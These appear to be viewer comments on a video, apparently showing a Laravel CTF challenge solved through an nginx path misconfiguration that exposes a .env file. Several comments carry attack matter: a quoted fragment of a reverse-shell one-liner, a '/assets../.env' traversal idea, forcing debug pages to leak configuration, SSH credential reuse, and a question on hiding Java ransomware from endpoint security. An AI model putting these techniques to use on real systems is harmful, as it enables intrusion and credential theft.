wow that was fun to watch, i honestly didn't know about that nginx misconfig. uhhh time to go recheck all of my configs coz thats pretty scary

I’ve always been no trailing slash guy, but now I am thinking going to be always tailing slash guy

A small clarification - the .env file is gitignored because different environments uses different .env values, and to keep this away from source control, but not because we want to exclude/hide it from a production environment. Of course, there are also other ways to set environment variables in a production runtime.

its mind blowing to see so many chrome tabs open at the same time🤣

Thank you so much 🥰🥰🥰

Damn man... Its so awesome to watch you do this.. Keep it up

FYI, Azure VMs are not "pingable", Microsoft for some reason removed this feature from Azure VMs

I had no idea what was going on until the last few moments. No idea what Capture the Flag had to do with Laravel. But you're actually playing Capture the Flag. Interesting.

Hi John, just need some knowledge that I am trying to figuring out recently, currently I am fiddling around with Java, and interesting thing I found about it was that Windows 10 does not check for Code Sigining of a Jar file but if I deploy a simple hello world written in C/C++, exe file on a different computer it detects it as a malacious file and does not let user to run it. What are the edge cases that will prevent someone from writting a Java based virus or a ransomware to go undetected by a security endpoint given the fact writing obfuscate code to prevent behavioural analysis by security.

John… lovely work as always dude! Cheers! [checks path mods]

Interesting, any other / exploits we should know about to path our systems?

kuuuurwa

Thanks so much Amazing content ^^

Wow John your amazing!! Thank you for all the amazing how-tos! I’m curious how long did this take you to do? Your real time, keep it up. God bless.

I am not super familiar with command line: what does "cat /tmp/f | sh -1 2>&1" actually do? Thanks John, your videos are really awesome!

great wholesom video

👏🏻👏🏻👏🏻 Awesome!

❤️

That was hot

Hey John, can you do Etituber? I'm curious about the XXE payload...

I am posting all the information of identity thefts scammers as I am building myself to be unstoppable success of my own

Laravel 😍😍😍

What's the cookies plugins, John?

Amazingg videoo !!

Hey John. I wonder if i can solve these challenges after the ctf is over ?. I want to practice on my own

nice one

That ngix misconfig is scary

Hey John, I notice that you always solve more web challenge in HTB Business CTF. I think that your channel root is reversing or crypto. Can i know the reason?😊

Sir, I want to build a booking website using php, html and css. If I don't learn javascript is it possible to make it

Bottomline: deny ANY file/directory starting with a dot from being accessed publicly.

Test CVE-2021-36934 Serious SAM and Hive-Nightmare

Can you do a video of Pegasus spyware how it works and how to protect from it

When you get access to .env you have access to the db name user + password I think you could just try that for to ssh to the server

could you access the .env file? *EDIT* lol I was way too impatient.

What version of Xubuntu does the VM have?

I will no longer sleep at night.

What about simply reading /assets../.env? If that doesn't work, because we are speaking of php developers, there is always at least one route that can be easily forced into a 500 to get the debug screen and read the entire configuration from there.

Pog? Pog? Being early-ish?

I didnt know seth rogan had a twin brother who is a hacker

I'm sry, I found you a few weeks ago, and love the content, but I just have to say it. God: 'how many frackles do you want" John: "yes" XD love you! Keep it up!

Sir please give your picoCTF class code

you do not need to close the `?>` in php files

all it took was a simply missing '/'

Why are you using old version of Ubuntu

Need firebase exploit